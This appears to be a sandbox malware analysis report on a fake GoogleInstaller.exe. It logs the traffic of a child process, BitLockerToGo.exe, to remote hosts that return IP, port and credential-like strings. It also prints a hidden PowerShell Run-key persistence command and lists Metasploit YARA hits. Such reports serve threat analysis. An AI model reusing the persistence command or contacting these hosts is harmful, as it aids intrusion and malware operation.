Oct 2, 2024 15:14:10.999051094 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:26.009804964 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:26.014601946 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:30.985721111 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:30.986329079 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:30.991549015 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:40.080559015 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:14:40.085519075 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:14:40.440237045 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:40.445069075 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:40.662520885 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:40.710314035 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:51.264542103 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:14:51.267431021 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:14:51.272360086 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:06.281028032 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:06.285945892 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:10.093497038 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:15:10.521590948 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:15:10.671895981 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:10.677670002 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:10.893595934 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:10.941364050 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:11.507594109 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:11.507802010 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:11.512650967 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:26.524679899 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:26.530034065 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:31.728423119 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:31.729779005 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:31.734796047 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:40.074933052 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:15:40.080216885 CEST | 80 | 54992 | 46.8.236.61 | 192.168.2.6
Oct 2, 2024 15:15:40.080324888 CEST | 54992 | 80 | 192.168.2.6 | 46.8.236.61
Oct 2, 2024 15:15:40.903947115 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:40.908873081 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:41.123218060 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:41.174309015 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:51.948328972 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:15:51.948796034 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:15:51.953700066 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:06.965131998 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:06.970170021 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:11.137132883 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:11.142066002 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:11.359841108 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:11.403307915 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:12.171749115 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:12.172252893 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:12.177171946 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:27.189126968 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:27.194205999 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:32.392792940 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Oct 2, 2024 15:16:32.397372961 CEST | 54994 | 22993 | 192.168.2.6 | 94.103.90.9
Oct 2, 2024 15:16:32.402287006 CEST | 22993 | 54994 | 94.103.90.9 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 15:14:05.067522049 CEST | 53 | 59072 | 162.159.36.2 | 192.168.2.6
Oct 2, 2024 15:14:05.530723095 CEST | 49564 | 53 | 192.168.2.6 | 1.1.1.1
Oct 2, 2024 15:14:05.538062096 CEST | 53 | 49564 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 15:14:05.530723095 CEST | 192.168.2.6 | 1.1.1.1 | 0x8b0b | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 15:14:05.538062096 CEST | 1.1.1.1 | 192.168.2.6 | 0x8b0b | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                  • 46.8.232.106
                                                  • 46.8.236.61
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 54991 | 46.8.232.106 | 80 | 6512 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 15:14:08.444242001 CEST | 298 | OUT | POST / HTTP/1.1
Host: 46.8.232.106
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: tbNgF6Ul
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
Oct 2, 2024 15:14:09.110162973 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Oct 2024 13:14:09 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 54992 | 46.8.236.61 | 80 | 6512 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 15:14:09.118948936 CEST | 297 | OUT | POST / HTTP/1.1
Host: 46.8.236.61
User-Agent: Go-http-client/1.1
Content-Length: 162
X-Api-Key: rvHBX3VV
Accept-Encoding: gzip
Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
Oct 2, 2024 15:14:10.065938950 CEST | 460 | IN | HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 13:14:09 GMT
Content-Length: 342
Content-Type: text/plain; charset=utf-8
Data Raw: 39 34 2e 31 30 33 2e 39 30 2e 39 3b 32 32 39 39 33 3b 68 70 63 77 74 79 36 53 74 72 35 57 70 61 4f 39 3a 36 4d 4d 2f 52 6b 76 2f 75 37 53 34 32 43 32 36 50 43 5a 2e 6a 47 37 38 68 74 33 2e 46 39 34 32 49 5a 44 33 73 46 64 32 4e 4a 6b 2e 37 7a 42 31 46 51 41 30 43 54 33 36 65 48 63 2c 37 71 77 68 4c 6f 63 74 77 6a 37 74 67 33 4e 70 4e 71 32 3a 62 4c 7a 2f 6b 76 38 2f 77 79 58 34 50 7a 44 36 48 44 73 2e 79 72 58 38 6f 43 79 2e 4d 66 69 32 78 30 55 33 39 31 4c 36 68 4d 6d 2e 62 32 6e 36 7a 44 52 31 6f 42 4c 2c 35 69 6f 68 71 47 4d 74 57 64 36 74 37 63 6e 70 36 64 65 3a 76 5a 33 2f 4b 42 50 2f 6b 53 48 39 46 50 4d 33 73 30 57 2e 4d 32 51 31 39 44 4a 38 67 43 31 35 69 61 43 2e 67 6b 72 31 47 49 7a 35 41 41 34 39 55 6f 64 2e 6e 35 62 32 41 43 53 35 32 36 41 33 66 78 6c 2c 53 44 32 68 61 76 38 74 72 78 67 74 74 53 50 70 69 77 7a 3a 34 52 6b 2f 6e 47 35 2f 34 48 4c 39 73 37 55 31 4d 63 6b 2e 6b 52 33 32 77 45 4c 31 62 51 6e 32 45 32 59 2e 75 54 47 31 47 62 47 36 79 68 78 36 34 37 4e 2e 78 51 38 39 59 70 4d [TRUNCATED]
Data Ascii: 94.103.90.9;22993;hpcwty6Str5WpaO9:6MM/Rkv/u7S42C26PCZ.jG78ht3.F942IZD3sFd2NJk.7zB1FQA0CT36eHc,7qwhLoctwj7tg3NpNq2:bLz/kv8/wyX4PzD6HDs.yrX8oCy.Mfi2x0U391L6hMm.b2n6zDR1oBL,5iohqGMtWd6t7cnp6de:vZ3/KBP/kSH9FPM3s0W.M2Q19DJ8gC15iaC.gkr1GIz5AA49Uod.n5b2ACS526A3fxl,SD2hav8trxgttSPpiwz:4Rk/nG5/4HL9s7U1Mck.kR32wEL1bQn2E2Y.uTG1GbG6yhx647N.xQ89YpM1Ds4
Oct 2, 2024 15:14:40.080559015 CEST | 6 | OUT | Data Raw: 00
Data Ascii:
Oct 2, 2024 15:15:10.093497038 CEST | 6 | OUT | Data Raw: 00
Data Ascii:



Target ID: 0
Start time: 09:13:34
Start date: 02/10/2024
Path: C:\Users\user\Desktop\GoogleInstaller.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\GoogleInstaller.exe"
Imagebase: 0xe80000
File size: 17'015'808 bytes
MD5 hash: 3D429D9F74DA7B1F95EA8DB8A486ED20
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:13:47
Start date: 02/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0xa40000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 6
Start time: 09:13:54
Start date: 02/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
Imagebase: 0x310000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 09:13:54
Start date: 02/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 09:14:06
Start date: 02/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0xa40000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

                                                    Strings
                                                    • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 00EBB884
                                                    • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no, xrefs: 00EBB802
                                                    • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect., xrefs: 00EBB7A7
                                                    • %, xrefs: 00EBB8C1
                                                    • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexbufio.Scanner: Read returned imposs, xrefs: 00EBB829
                                                    • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r, xrefs: 00EBB8B8
                                                    • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00EBB7CE
                                                    • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 00EBB85D
                                                    • ) @s -> Pn=][}]i)> +; )(25[] %-%q])<<>>==!=||&&>=<==~!~in**OUCNST=#", xrefs: 00EBB78C